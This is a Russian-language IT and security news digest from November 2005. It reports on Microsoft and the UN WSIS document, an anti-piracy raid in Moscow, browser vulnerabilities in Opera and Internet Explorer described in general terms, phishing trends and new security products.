Из документа ООН под давлением Microsoft были удалены упоминания о свободном ПО и Linux, так как такое ПО якобы ставит своей целью «сделать невозможным получение любых доходов от программного обеспечения как коммерческого продукта». В пятницу софтверный гигант признал, что он попросил убрать ссылки на свободное ПО из документа, представленного на прошедшей конференции Всемирного саммита ООН по информационному обществу (WSIS). Организация Free Software Foundation Europe (FSFE) выразила недовольство внесенными в документ изменениями и заявляет, что несмотря на свое участие в обсуждении документа, она не знала об изменениях, внесенных Microsoft. В документе, получившем название «Венских заключений», обсуждаются проблемы ИТ и творчества. Первоначальный проект документа содержал слова о том, как модель свободного ПО меняет характер работы людей. «Все больше доходов приносит не продажа цифровых произведений, которые могут распространяться свободно и совершенно бесплатно, а дополнительные услуги. Одним из примеров служит модель свободного ПО», — говорилось, по утверждению FSFE, в оригинальном документе. Окончательная же его версия не содержит упоминания о свободном ПО. В ней это же место звучит так: «Все больше доходов приносят услуги, дополняющие цифровые произведения». Изменить фразу попросил менеджер по связям с общественностью Microsoft Austria Томас Люц, так как «она отражает односторонний взгляд на индустрию ИКТ». «Основная причина заключается в том, что цель свободного ПО — не способствовать здоровому бизнесу на программном обеспечении, а сделать вообще невозможным получение каких-либо доходов от программного обеспечения как коммерческого продукта», — добавил он.
Подробнее

29/11/2005 09:33 Торговля пиратскими дисками в Москве парализована в результате спецоперации МВД
С конца прошлой недели в Москве парализована торговля контрафактной медиапродукцией - в большинстве традиционных мест на улицах и в торговых центрах не продаются компакт-диски и DVD-диски с музыкой, фильмами и ПО. В палатках с дисками, которые продолжают работу, можно купить лишь лицензионные копии. Газета "Коммерсант" выяснила, что эти события являются результатом операции "Контрафакт" - крупнейшей милицейской операции такого рода в России. В Управлении по борьбе с экономическими преступлениями (УБЭП) ГУВД Москвы сообщили, что в акции принимают участие 300 сотрудников службы по борьбе с экономическими преступлениями, которым за несколько дней удалось изъять около 500 тысяч контрафактных носителей и "привлечь к уголовной ответственности уже несколько десятков человек из числа организаторов пиратского бизнеса". По словам представителей пиратского бизнеса, большинство точек закрылось еще к концу прошлой недели, когда до их владельцев дошли слухи о грядущей операции. Палатки закрывались "по техническим причинам", сотрудники рынка сообщают, что "не знают" о том, когда точки могут возобновить работу. По оценкам комиссии по безопасности информационного рынка совета предпринимателей при мэре и правительстве Москвы, ежедневно пиратских компьютерных дисков в Москве продается не менее чем на 2,26 миллионов рублей. Продавцы считают, что контрафактных дисков в Москве ежедневно продается не менее чем на 10 миллионов рублей. Исходя из этих оценок, эксперты делают вывод, что ежедневная упущенная выгода пиратов в ходе проведения милицейской операции составляет не менее 12,5 миллионов руб.
Подробности

27/11/2005 15:35 Переговоры инопланетян угрожают компьютерной безопасности
Американский физик пришел к выводу, что поиски сигналов внеземных цивилизаций могут представлять серьезную угрозу безопасности земных компьютерных систем, пишет в пятницу газета The Guardian. В очередном номере журнала Acta Astronautica ученый Ричард Керриган (Richard Carrigan) утверждает, что при расшифровке перехваченных в рамках проекта по поиску внеземных цивилизаций (SETI) космических электромагнитных волн может произойти масштабный сбой в работе компьютеров. Дело в том, что полученные сигналы рассылаются через Интернет для анализа на компьютерах добровольцев, принимающих участие в проекте. Пользователь загружает специальную экранную заставку, которая обрабатывает данные, пока компьютер не используется владельцем. До сих пор ученым не удалось перехватить ничего кроме вспышек радиации и отдаленного эха "Большого взрыва". Однако, предостерегает Керриган, более мощные телескопы и компьютеры вскоре позволят зафиксировать сигнал инопланетян. Если такой сигнал попадет в систему SETI без предварительной проверки, это приведет к сбою в работе подключенных к сети компьютеров, подобно созданному человеком вирусу. Поэтому ученый призывает координаторов проекта разработать меры безопасности, которые позволят помещать потенциально опасные сигналы в карантин прежде, чем они заразят Интернет.
Подробнее

27/11/2005 15:02 HIPS от StarForce
Компания StarForce объявила о выпуске новой версии своей системы отражения локальных угроз (Host Intrusion Prevention Systems, HIPS) под названием Personal Safe'n'Sec 2.0. В новой версии расширена информационная часть: пользователь сможет получить подробную информацию об активности подозрительного приложения, а для упрощения безопасного решения появился раздел "Совет". Также появилась возможность контролировать сетевую активность процессов и определять, какого типа активность нужно контролировать для определенных процессов. Новый менеджер упрощает возможность контроля за процессами, происходящими в операционной системе и позволяет удалять файлы подозрительных приложений, чтобы они не запускались после перезагрузки. Также Safe'n'Sec 2.0 появилась возможность редактировать правила контроля приложений. Продукт будет распространяться через электронные магазины, а пользователи версии 1.1 смогут обновить продукт бесплатно.
"Открытые системы"

27/11/2005 14:01 Opera "залатала" две уязвимости
Opera выпустила патч, предназначенный для закрытия двух критических уязвимостей в одноименном браузере. Данные уязвимости касаются работы c Macromedia Flash Player и кода под Linux и Unix. Уязвимость, связанная с Flash, была обнаружена в ноябре. Macromedia предупредила об ошибке в Flash Player, которая могла быть использована для захвата системы с использованием браузера. Исследователи по ИТ-безопасности из eEye смогли показать пример эксплуатации дыры. Новая версия Opera с соответствующим исправлением, 8.5.1, вышла на этой неделе. В нее включен плеер версии 7.61. Вторая уязвимость, найденная Secunia Research, может быть использована для атак на Linux и Unix. Сценарий запуска программы может выполнить команду системы, вложенную злоумышленником в URL, при нажатии на ссылку, если браузер Opera используется для просмотра веб-страниц. В Firefox аналогичная ошибка была исправлена в сентябре. Разработчики Opera заявили, что в новой версии им удалось увеличить стабильность работы браузера при просмотре страниц с Java для японских версий Mac OS X.
CNews

27/11/2005 13:47 Gartner уточняет рекомендации в отношении Windows Vista
Аналитическая компания Gartner разъяснила свои рекомендации по поводу сроков внедрения новой операционной системы Windows Vista, которую корпорация Microsoft намерена выпустить в конце следующего года. Около полутора недель назад Gartner посоветовала корпоративным пользователям не спешить с переходом на Windows Vista до 2008 года. Свои рекомендации компания объяснила тем, что большая часть усовершенствований в Windows Vista связаны с безопасностью и уже имеются в широко распространенных продуктах сторонних производителей. Другие возможности Vista, такие как, например, расширенные средства локального поиска также можно без особых проблем реализовать на старых платформах в виде дополнительных приложений. Gartner отмечает, что ее публикация была не совсем корректно истолкована. Внедрить Windows Vista не удастся за одни сутки. На тестирование корпоративных продуктов на совместимость с новой ОС Microsoft и получение поддержки от поставщиков такого ПО может уйти до полутора лет. Иными словами, тем, кто хочет перейти на операционную систему Windows Vista в 2008 году, придется проделать большой объем работы. И если не заняться этим сразу же после выхода Windows Vista, то переход на новую программную платформу может затянуться до 2010 года.
Источник

27/11/2005 12:45 Разработчики открытого ПО работают быстрее
По данным исследования, проведенного компанией Evans Data, разработчики продуктов с открытым кодом исправляют ошибки в програмах в следующей пропорции (опрошено 450 человек): 17% исправляют ошибки менее чем за 4 часа, 28% просят от 8 до 24 рабочих часов и 30-ти процентам требуются более 24 рабочих часов.
Подробности

26/11/2005 17:58 Фишеры используют все более сложные технологии для сбора банковских реквизитов
Почти все онлайновые банковские системы освоены мошенниками-фишерами, утверждают специалисты по информационной безопасности компании MessageLabs. В течение прошлого года эксперты MessageLabs обнаружили в Интернете более 18 млн. писем, отправленных фишерами. Из всего потока электронной почты 73% писем были спамом (год назад - 40%), а каждое 16-е содержало вирус. Фишеры используют все более сложные технологии для сбора банковских реквизитов. Ранее атаки фишеров, в основном, состояли в перенаправлении ничего не подозревающего пользователя на подставной банковский сайт; теперь информация о банковских реквизитах крадется при открытии электронного сообщения. Пользователю достаточно лишь открыть письмо на отвлеченную тему или вложение письма, использующие уязвимость в почтовых клиентах Microsoft. "Фишинг" может обойтись пользователям Сети в 500 миллионов долларов. Такой подсчет сделал Ponemon Institute (http://www.ponemon.org/), занимающийся вопросами privacy и гражданских свобод. В рамках исследования было опрошено 1335 американских интернет-пользователей. В результате опроса обнаружилось, что 76% респондентов знакомы с электронными письмами-обманками. 70% из этого числа заходили на сайт-обманку, ссылка на который располагалась в подложном письме, 15% оставляли на этом сайте свои персональные данные, а 2% признались в том, что понесли конкретные финансовые потери в результате фишинга.
Источник

26/11/2005 11:49 В МГУ про PKI
Компания Aladdin организовала обучение студентов технологии PKI на базе МГУ. Обучение инициировано Ассоциацией защиты информации при поддержке кафедры математической кибернетики факультета ВМиК МГУ им. М.В.Ломоносова. Курс предназначен для студентов IV курса кафедры и состоит из лекций и практических занятий. Курс призван дать слушателям базовые знания по построению и использованию инфраструктуры PKI на платформе Windows с использованием USB-ключей и смарт-карт. Возможно, слушатели этого курса смогут применить полученные знания на практике, когда PKI будет развернута в России – в настоящее время в Госдуму внесен пакет законов об электронно-цифровой подписи, которая в том числе предполагает и использование PKI. Если эти законы будут приняты, то потребность в специалистах, которые сейчас обучаются в МГУ, может резко возрасти.
"Открытые системы"

26/11/2005 11:25 В обновленной бета-версии Windows Vista улучшен интерфейс
Корпорация Microsoft выпустила обновленную бета-версию операционной системы Windows Vista, презентация которой должна состояться в конце следующего года. Как сообщает ActiveWin.com, вариант Windows Vista Build 5259 носит статус Community Technology Preview (CTP) и является промежуточным между первой и второй бета-версиями ОС. Это уже третья такая модификация: первая была выпущена в сентябре, а вторая - появилась в середине октября. В обновленной Community Technology Preview реализованы ряд существенных нововведений. Прежде всего, в глаза бросается измененная форма кнопки "Пуск". Если в версиях, начиная с Windows 95, она была прямоугольной (или с закругленными краями, как в Windows ХР), то теперь она стала круглой. Кроме того, корпорация Microsoft переработала и само меню "Пуск". Вариант Windows Vista Build 5259, помимо появившихся в прошлой CTP-версии приложения Windows Media Player 11 и галереи цифровых фотографий Windows Digital Gallery, включает встроенное средство Windows Antispyware для борьбы со шпионскими модулями, а также средства для обнаружения вредоносных программ. Среди прочих нововведений упоминаются улучшенный пользовательский интерфейс, измененный фоновый рисунок по умолчанию и, наконец, заработавшая как положено функция мгновенного отключения.
Подробности и скриншоты

26/11/2005 10:30 Нормальная работа сети ICQ была нарушена из-за программных сбоев
Многие пользователи старых версий программ-клиентов популярной системы интернет-пейджинга ICQ с вечера среды отмечают регулярную нестабильную работу своих средств для мгновенного обмена сообщениями через Интернет. Во многих случаях официальные клиенты версий младше 5 при подсоединении к сети выдают сообщение о системной ошибке ОС Windows (runtime error), иногда несколько. Сообщения об ошибках поступают от пользователей во многих странах мира. На сайте ICQ не содержится никаких сведений о возможной причине этого явления, сообщается о нормальной работе сети в данный момент. Установлено, что проблем не наблюдается, если используется пятая (последняя) версия клиента или неофициальные клиенты. Специалисты по компьютерной безопасности предполагают, что проблемы могут быть связаны с изменениями в протоколе обмена данными, используемом компанией ICQ (как известно, она входит в AOL). Выявлено, что последняя версия официального клиента и альтернативные программы не подвержены этой ошибке. Вместе с тем, следует отметить, что нельзя говорить о том, что использование старых версий ICQ-клиента однозначно увязано с возникновением нынешних ошибок. Появились "рецепты" исправления ошибок, связанные c внесением изменений в системный реестр и с "починкой" базы данных ICQ-диалогов, однако их действенность подтверждается далеко не во всех случаях. Специалисты указывают, что существует возможность преднамеренной атаки, когда пользователям рассылаются особым образом сформированные пакеты данных, вызывающие "падение" определенных версий клиентов ICQ. Однако наиболее вероятен вариант с ошибкой программистов при работах на сервере - есть шанс, что она будет устранена, и сбои прекратятся.
Источник

26/11/2005 10:17 Госдума приняла закон о персональных данных граждан
Госдума России ратифицировала Конвенцию Совета Европы о защите физических лиц при автоматизированной обработке персональных данных и приняла в первом чтении законопроект "О персональных данных", передает агентство ИТАР-ТАСС. Как заявили в Госдуме, одобренные документы направлены на создание единых требований к обработке персональных данных во всех сферах человеческой деятельности. Согласно законопроекту, данные личного характера разрешается собирать и обрабатывать только с согласия конкретного лица. Исключением могут стать случаи, когда обработка этих данных необходима для защиты его жизни и здоровья. Кроме того, разрешается обрабатывать персональные данные на основании закона, предусматривающего такую обработку. Законопроект вводит особую категорию персональных данных, которые не подлежат обработке. В эту категорию вошли сведения о расовом и этническом происхождении, национальной принадлежности, политических взглядах, религиозных и философских убеждениях, состоянии здоровья, сексуальных наклонностях и судимости. Законопроект предусматривает создание специального уполномоченного органа, который будет обеспечивать защиту персональных данных граждан. В случае нарушения законодательства этот контрольный орган вправе аннулировать регистрацию информационной системы, в которой были выявлены нарушения.
Законопроект

26/11/2005 01:53 Рынок серверов движется в сторону низких цен и Windows
Благодаря продолжающемуся спросу на недорогие серверы стоимостью до $25 тыс, Microsoft Windows в третьем квартале впервые стала лидером рынка серверных операционных систем. В опубликованном в среду отчете по мировому рынку серверов IDC отмечает, что недорогие, или массовые, серверы продолжают толкать вверх рынок серверов, который в третьем квартале вырос на 8,1% по сравнению с аналогичным периодом прошлого года — до $12,5 млрд. Этот квартал ознаменовался дальнейшим сдвигом рынка в направлении недорогих серверов, которые часто соединяют в кластеры для получения более высокой производительности и гибкости. Рост происходит за счет более дорогих систем, продажи которых в третьем квартале пошли на убыль. За год рынок массовых серверов стоимостью до $25 тыс. вырос почти на 15%. А серверы средней ценовой группы четвертый квартал подряд отбирают долю рынка у корпоративных серверов, и в этом квартале доходы от них выросли почти на 4%. Между тем объем продаж корпоративных серверов стоимостью свыше $500 тыс. уменьшился на 1,2%. Продажи серверов с операционной системой Windows увеличились почти на 18% и составили $4,6 млрд. В этом квартале Microsoft впервые может сказать, что она выпускает самую популярную серверную операционную систему. IDC объясняет рост популярности Windows расширением внедрения операционной системы «в поддержку растущих рабочих нагрузок и проектов по консолидации».
Более подробно

24/11/2005 15:53 Безопасные сайты позеленеют во всех браузерах
Разработчики четырех самых популярных веб-браузеров IE, Firefox, Opera и Konqueror на прошлой неделе встретились в Торонто и договорились унифицировать свои браузеры ради безопасности. Одно из нововведений, о которых шла речь на неформальной встрече разработчиков 17 ноября, — новый способ информирования пользователей о посещении безопасных веб-сайтов. Кроме того, планируется кардинально поменять внешний вид всплывающих окон. Согласно договоренности, новые функции должны быть реализованы абсолютно одинаково во всех браузерах, чтобы не запутывать пользователя. На самом деле разработчики уже около восьми месяцев вели между собой диспут, какие функции безопасности и каким именно образом нужно реализовать в браузерах, но только 17 ноября в Торонто они пришли к согласию. Самое заметное нововведение состоит в способе отображения некоторых важных сайтов, таких как eBay и PayPal. Разработчики договорились, что при посещении таких сайтов адресная строка браузера должна становиться зеленой. Эта функция поможет бороться с фишингом, который предусматривает заманивание пользователей на сайты-фальшивки, чтобы выманить у них пароли и другую персональную информацию. Чтобы браузер знал, какие сайты нужно подсвечивать зеленым, у сайта должен быть специальный цифровой сертификат с цифровой подписью центра сертификации, такого как Verisign или EnTrust. Разработчики браузеров договорились создать более строгую процедуру выдачи сертификатов. Браузер будет проверять сертификат и окрашивать адресную строку в зеленый или — если проверка оказалась неудачной — в красный цвет.
Более подробно

24/11/2005 15:32 КНДР готовиться к кибер-войне
О возможностях Северной Кореи в области ведения цифровой войны известно немного. В прошлом месяце генерал-майор Сон Юн-гун (Song Young-geun), руководитель южнокорейского управления военной безопасности, предупредил, что соседнее государство выпускает 100 хакеров ежегодно, но о доказательствах распространяться не стал. В прошлом году советник президента Буша по технологиям Ричард Кларк заявил, что Северная Корея, Ирак и Иран (пресловутая "ось зла"), наряду с Китаем и Россией проводят обучение специалистов в области интернет-войн. Изолированная и бедная Северная Корея наращивает свой военный потенциал в рамках национальной политики "армия прежде всего". Осуществляется программа создания собственных ракет большой дальности. По данным американских официальных лиц, представители Северной Кореи успели довести до их сведения, что КНДР уже обладает ядерным оружием и будет наращивать ядерный арсенал и далее, если только не получит от Вашингтона экономической помощи и гарантий безопасности, в которых крайне нуждается. У северокорейской программы кибервойн есть весьма влиятельный покровитель - лидер страны Ким Чен Ир. В ходе своих визитов за рубеж (в Китай и Россию) в 2000 и 2001 годах, г-н Ким посетил лаборатории по разработке программного обеспечения и центры высоких технологий. В Северной Корее по его указанию созданы компьютерные лаборатории, проводится всеобщее обучение компьютерной грамотности в школах и даже разработан напиток, снимающий "компьютерную усталость". В 2001 году он декларировал цель "компьютеризации всей страны".
Crime-Research

24/11/2005 14:31 Знакомьтесь - GeSWall
GentleSecurity Team, которая позиционирует сама себя как группа энтузиастов и научных исследователей, работающих над ПО для компьютерной безопасности, сообщила о выпуске ПО под названием GeSWall (GentleSecurityWall) версии 2.1. GeSWall представляет собой intrusion prevention system - систему предупреждения проникновения (взлома). Как пишут создатели, ПО защищает от вторжений и повреждения системы вредоносным ПО, изолируя уязвимое приложение. Утверждается, что GeSWall значительно отличается (в лучшую, разумеется, сторону) от традиционных антивирусов и персональных файрволлов, легко настраивается и также хорошо работает. ПО предназначено для ОС семейства Windows (в требованиях написано об Windows XP SP2).
Сайт проекта

24/11/2005 12:42 Уязвимость в "Yahoo! Mail"
Richard Fuchshuber из Бразилии сообщает о наличии уязвимости в Вэб-интерефейсе популярной почтовой системы "Yahoo Mail". Автором была обнаружена возможность вставки данных в HTML-интерфейс, что является типичным примером XSS (кросс-сайт скриптинг). Была продемонстрирована возможность вставки подобных данных, которые, как указывает автор, позволяют выполнить фишинг-атаку. Попытки контактов со службой техподдержки успехом не увенчались.
Описание уязвимости

24/11/2005 12:28 Novell: У Microsoft ложная концепция безопасности
Компания Novell отреагировала на критику Microsoft в адрес своей корпоративной операционной системы SuSE Enterprise Linux. PR-менеджер Novell Кевин Барни (Kevin Barney) в ответ раскритиковал софтверного гиганта и его политику в своем блоге. На прошлой неделе на ИТ-форуме Microsoft корпорация опубликовала доклад о сравнительном исследовании своего Windows Server и операционных систем на базе Linux. Согласно выводам авторов доклада, Windows Server не только надежнее, чем SuSE, но и обеспечивает большую интероперабельность (взаимную совместимость) с приложениями. Барни написал в ответе, что доклад вводит рынок в заблуждение по поводу Linux и умалчивает о различных проблемах надежности, безопасности и стоимости эксплуатации, с которыми приходится сталкиваться пользователям Windows. Он опроверг наличие проблем в SuSE, обнаруженных компанией Security Innovation, которая является сертифицированным партнером Microsoft. По его словам, у пользователей SuSE нет проблем с интероперабельностью, о которых делается предположение в докладе. Такие проблемы есть, но 1800 продуктов были сертифицированы на интероперабельность с SuSE, и сертификация остальных — «дело времени». По мнению Барни, Microsoft придерживается ошибочной концепции безопасности, а именно «интегрированности инноваций». Цельная Windows становится полностью уязвимой из-за дыры в одном из компонентов, а модульная Linux — нет. В систему Microsoft можно внедриться через приложения, например, браузеры. К тому же, считает менеджер Novell, из-за «интегрированности инноваций» корпорация не может долго выпустить Windows Vista и Longhorn Server, пишет РС Рro.
CNews

24/11/2005 11:45 Динамически обновляемая защита
Компания TippingPoint (подразделение 3Com) выпустила решение TippingPoint X505 - первую интегрированную платформу безопасности на базе технологии предотвращения вторжений IPS. Оно поддерживает функции межсетевого экранирования с отслеживанием состояния соединений, туннелирование IPSec-VPN, управления полосой пропускания, Web-фильтрации и динамической маршрутизации. Новая платформа отвечает растущим потребностям корпоративных заказчиков в комплексном решении вопросов безопасности. Платформа TippingPoint X505 осуществляет полный анализ пакетов для блокирования вредоносного трафика, ограничение малозначительных и приоритезацию критически важных приложений. Благодаря решению X505 заказчик может с помощью одного устройства обеспечить безопасность периметра корпоративной сети и удаленных офисов. В основе решения лежит базовая архитектура TippingPoint Intrusion Prevention System, позволяющая блокировать вирусы, черви, троянские программы, DoS-атаки, шпионские программы, фишинг, атаки на VoIP-системы и т.д. Отличие TippingPoint X505 от других многофункциональных устройств защиты состоит в том, что его ПО регулярно обновляется. Служба TippingPoint Digital Vaccine обеспечивает обновление всех устройств TippingPoint для защиты от критических уязвимостей и угроз типа Zero-Day (в день обнаружения уязвимости). Одной из самых привлекательных особенностей платформы X505 является возможность одновременного применения всего спектра заложенных в ней функций.
"Открытые системы"

24/11/2005 11:23 Брюс Шнайер: угроза кибертерроризма переоценена
Брюс Шнайер, основатель компании Counterpane Internet Security и известный специалист по криптографии, считает, что угроза кибертерроризма, о которой говорят многие правительственные органы и спецслужбы, в настоящее время переоценивается. Как сообщает CNET News, по мнению Шнайера, сейчас уделяется недостаточное внимание проблемам киберпреступности. Между тем, именно хакеры и сетевые мошенники представляют наибольшую опасность для корпоративных и частных пользователей. Свое заявление Шнайер сделал после того, как был обнародован очередной список наиболее актуальных в нынешнем году проблем с компьютерной безопасностью, составленный Американским институтом SANS. Хит-парад дыр в программном обеспечении публикуется институтом SANS на протяжении нескольких последних лет. Каждый год в распространенных программных пакетах обнаруживаются порядка двух с половиной тысяч уязвимостей, однако большая часть компьютерных атак затрагивают ограниченное количество наиболее опасных ошибок.
Подробности

24/11/2005 10:48 Китайские хакеры вскрыли четыре командные системы Министерства обороны США за одну ночь
Группа китайских хакеров подозревается в атаках против правительства США, нацеленных на сбор разведывательных данных. Группе хакеров, которую контрразведчики называют «Титановый дождь» и которая, как предполагается, базируется в китайской провинции Гуанчжоу, приписывают кражу военных секретов США, включая документацию и программное обеспечение планирования полетов авиации. «Из Редстоунского арсенала, штаба командования авиацией и ракетными силами сухопутных войск, злоумышленники украли спецификации системы планирования заданий для вертолетов сухопутных войск, а также программное обеспечение планирования полетов Falconview 3.2, применяемое в сухопутных войсках и ВВС», — сообщил во вторник директор SANS Institute Алан Паллер. Считается, что группа состоит из 20 хакеров. Паллер сказал, что заказчиком перехваченной информации, скорее всего, является китайское правительство. «Конечно, это правительство. Любое правительство готово заплатить сколько угодно за контроль над правительственными компьютерами других стран. Это гораздо лучше, чем подслушивать телефонные переговоры», — сказал Паллер на конференции в Министерстве торговли и промышленности Великобритании.
Подробности

24/11/2005 10:21 Microsoft выпустила техническую бета-версию Office 12
Корпорация Microsoft объявила о выпуске первой бета-версии новой модификации пакета Office, имеющего кодовое название Office 12. Об этом говорится в поступившем в редакуию "Ленты.Ру" пресс-релизе корпорации. Первое бета-тестирование является закрытым и в нем принимают участие только отобранные заказчики и партнеры. отмечается, что данная бета-версия является важным этапом на пути к выпуску следующей версии Microsoft Office System, запланированному на вторую половину 2006 года. Сообщается, что в Office 12 реализуется новый пользовательский интерфейс, создаются мощные средства работы с графиками и диаграммами и усовершенствованный инструментарий управления задачами и информацией. По словам представителя Microsoft, данная версия Office является наиболее значимым выпуском этого пакета за последние 10 лет. "Office 12 расширяет преимущества Office 2003, представленного 2 года назад, оставаясь при этом интегрированным набором программ, серверов и сервисов", говорится в пресс-релизе. Также сообщается, что выпуск первой бета-версии предшествует выходу общедоступной бета-версии весной следующего года. Как отмечалось ранее, Office 12 будет использовать открытые форматы хранения документов, построенные на спецификациях открытого стандарта XML.
Источник

23/11/2005 14:00 Хакеры начали охоту на "аську"
Программы для мгновенного обмена сообщениями (например, ICQ) все чаще становятся мишенями хакеров. Операционные системы пользуются уже гораздо меньшей популярностью, говорится в отчете SANS Top 20. По данным отчета SANS Top 20 за 2005 год, целью хакерских атак становятся программы резервного копирования и восстановления, а также "антивирусы и другие инструменты, которые, по мнению ИТ-служб многих организаций, должны обеспечивать безопасность". Переход к поиску и использованию уязвимостей в приложениях знаменует существенный сдвиг в тенденции последних лет, когда основной целью атак являлись Windows и другие операционные системы, а также интернет-службы: веб- и почтовые серверы. В 2005 году, резюмируется в отчете, "началась новая волна атак, сосредоточенных на приложениях". Помимо дыр в программах защиты и резервного копирования в списке Top 20 значатся критические уязвимости в ПО мгновенного обмена сообщениями (ICQ, MSN и др.), веб-браузерах, файлообменных приложениях и медиапроигрывателях. От обнаруженных серьезных уязвимостей пострадали Microsoft Office, Internet Explorer, Firefox, AOL Instant Messenger, RealPlayer и iTunes. Также важно отметить, что в предыдущем отчете, составленном Yankee Group, указывается на то, что число дефектов в антивирусном и другом защитном ПО растет гораздо быстрее, чем в Windows. Другим важным изменением в Top 20 стало то, что, по данным отчета, хакеры ныне хорошо информированы о критических уязвимостях систем безопасности маршрутизаторов. Проникновение на сетевые устройства дает хакерам плацдарм для наиболее эффективного перехвата информации и организации направленных атак, говорится в отчете.
Источник

23/11/2005 13:35 Universal готовится к новой атаке на музыкальные сайты Рунета
Компания Universal Music некоторое время назад подала иск против музыкального сервиса AllOfmp3.Com, однако на днях иск был отозван. Как сообщили «Вебпланете» в звукозаписывающей компании, Universal собирается с силами, чтобы нанести новый мощный удар. Практически все крупные музыкальные сервисы, распространяющие в Рунете музыку в формате MP3, состоят в Российском обществе по мультимедиа и цифровым сетям (РОМС). Согласно договору, эти сайты должны делать отчисления из своих прибылей за использование музыкального контента, а РОМС, в свою очередь, должен распределять эту прибыль между правообладателями. «Вебпланета» решила разобраться в этой ситуации и понять, что происходит на рынке музыкального копирайта в Рунете, взяв интервью у нескольких влиятельных в мире музыки в Интернет людей.
Подробности

23/11/2005 13:19 Московскому Internet Exchange — 10 лет
Российский Научно-Исследовательский Институт Развития Общественных Сетей (РосНИИРОС) извещает о том, что в этом году исполняется 10 лет Московскому Internet Exchange (MSK-IX). Начавшись с единственного узла, организованного на Московской международной телефонной станции ММТС-9, сегодня Московский Internet Exchange представляет собой, как информирует РосНИИРОС, надежную распределенную систему, включающую десять равноправных точек, объединенных высокоскоростной магистралью. К первому юбилею MSK-IX приурочены технический семинар и встреча участников Московского Internet Exchange, которые пройдут 24-го ноября 2005-го года в Экспоцентре на Красной Пресне (павильон №7, вход со стороны Краснопресненской набережной).
Подробности

23/11/2005 11:55 Два из трёх компьютеров в Сети уязвимы
По результатам исследования, проведенного компанией Qualys, два из трёх проверенных компьютеров содержат критичные для безопасности системы уязвимости. В течение трёх лет специалисты компании проверяли наличие критических уязвимостей в 32 миллионах машин. Выяснилось, что в 21 миллионе машин непременно присутствовала хотя бы одна уязвимость, которая, в случае внешней атаки, позволила бы злоумышленнику либо захватить управление компьютером, либо получить доступ к конфиденциальной информации, как утверждает представитель компании Qualys Герхард Эшельбек. Но у аналитиков есть и хорошие новости: в последнее время технические отделы большинства компаний все больше внимания уделяют вопросам компьютерной безопасности, своевременно обновляя системное программное обеспечение на находящихся в их ведении машинах. На этот факт указывает снижение общих временных затрат на обновление системы.
Подробности

23/11/2005 11:33 Microsoft признала факт наличия уязвимости в браузере
вчера мы сообщали о наличии уязвимости в браузере Internet Explorer. Также авторы уязвимости ставили в известность, что о наличии её предупреждал ещё 31 мая этого года Benjamin Tobias Franz. 21 ноября Microsoft был выпущен бюллетень - Microsoft Security Advisory (911302), в котором она всё-таки признаёт факт наличия уязвимости, позволяющей удалённо выполнить произвольный код в системе. Как сообщает сама компания, уязвимость вначале не получила высокого рейтинга опасности, поскольку, по имевшейся информации, могла использоваться лишь с целью аварийного завершения работы браузера. Изменить своё мнение компанию вынудил появившийся в Интернет эксплоит. Как утверждает M$, уязвимость присутствует в версиях IE 5.x и 6.x во всех ОС. Однако, в Windows Server 2003 (в том числе и с SP1) уязвимость отсутствует с включённым режимом Enhanced Security Configuration. Примечательно, что патч так и не выпущен - выдаются только общие рекомендации со ссылками на Trustworthy Computing Web site и Protect Your PC Web site. Видать, в погоне за сроками выпуска Vista компании просто некогда заниматься безопасностью пользователей своих ОС. Между тем, по данным Secunia, на текущий момент в Internet Explorer не пропатчены, по крайней мере, еще двадцать уязвимостей. Причем многие из этих дыр носят характер критически опасных и, соответственно, также могут эксплуатироваться злоумышленниками с целью получения несанкционированного доступа к удаленному компьютеру и выполнения на нем произвольных деструктивных операций.
Бюллетень Microsoft
Отчёт Secunia

23/11/2005 11:06 Microsoft добавляет к Live.com электронную почту и интернет-пейджинг
Компания открыла службу хостинга доменов в рамках своего нового семейства продуктов Live.com. В пятницу софтверный гигант открыл бета-версию службы Windows Live Custom Domains. Она предложит владельцам существующих интернет-доменов услуги электронной почты, интернет-пейджинга, а также ссылки на другие службы MSN. В начале ноября Microsoft анонсировала Live.com — веб-сайт и группу служб, объединенных под одной торговой маркой, которыми занимается отделение веб-портала Microsoft MSN. На этом веб-сайте компания разместила список разрабатываемых служб Live.com — Windows Live Ideas. В нем перечислено множество служб, таких как сайт аггрегации веб-контента Live.com и сайт Windows Live Mail, который сейчас проходит бета-тестирование.
Источник

23/11/2005 10:42 Выход MySQL 5.0.16
Анонсирован выход второй версии MySQL после объявления ветки 5.0 стабильной, сообщает opennet.ru. В 5.0.16 исправлено около 60 ошибок. Кроме того, можно отметить следующие новшества: геометрические типы полей для InnoDB, NDB, BDB и ARCHIVE хранилищ; опция --hexdump в mysqlbinlog; в CREATE VIEW и ALTER VIEW заработали элементы DEFINER и SQL SECURITY, добавленные в MySQL 5.0.13, но активированные только сейчас.
Анонс

22/11/2005 13:47 В Opera найдена опасная уязвимость
Обнаружена уязвимость в браузере Opera, которая позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Уязвимость существует при обработке параметров команд в сценарии, который запускает браузер Opera. Удаленный пользователь может с помощью специально сформированного URL, содержащего символы обратной кавычки (`), выполнить произвольные команды на целевой системе. Уязвимость может быть эксплуатирована только на Unix/Linux-платформах посредством внешнего приложения, использующего уязвимый браузер по умолчанию (например с помощью почтового клиента). «Дыре» присвоен рейтинг опасности «высокая». Уязвима Opera 8.5, возможно более ранние версии на Unix/Linux. Для использования уязвимости нет эксплойта. Для решения проблемы установите последнюю версию (8.51) с сайта производителя.
Описание

22/11/2005 13:13 Уязвимость в Internet Explorer
Как сообщают господа из английского агенства с довольно странным названием Computer Terrorism (UK) Ltd в своём исследовании, в популярном браузере Internet Explorer обнаружена уязвимость, которая представляет собой незакрытую M$ уязвимость в функции Java Script "window()", используемой для объектов в соединении с <BODY onload> событиями. Предыдущее описание уязвимости было опубликовано 31/05/2005 Benjamin Tobias Franz. Наличие уязвимости позволяет удалённо (при посещении специальным образом сформированной страницы) выполнить произвольный код в системе. Таким образом, пользователи Internet Explorer версий 5.5 и 6.x могут быть подвержены атаке. Для устранения уязвимости рекомендуется до выхода официального патча отключить active scripting. Авторами написан эксплоит уязвимости.
Описание

22/11/2005 12:48 Ричард Столман не доверяет RFID
Основатель проекта открытого кода GNU Ричард Столман (Richard Stallman) не доверяет технологии радиочастотных этикеток. На Мировой саммит ООН в Тунисе он захватил с собой алюминиевую фольгу, в которую заворачивал свой пропуск с RFID. На саммите 2003 года представители индустрии уверяли, что радиочастотные этикетки (RFID) не будут использоваться по причине недостаточной защиты конфиденциальности граждан, но с тех пор технология получила широкое распространение. В своей речи на саммите Столман говорил о данной угрозе RFID, и раздал всем желающим фольгу для оборачивания пропусков.
Источник

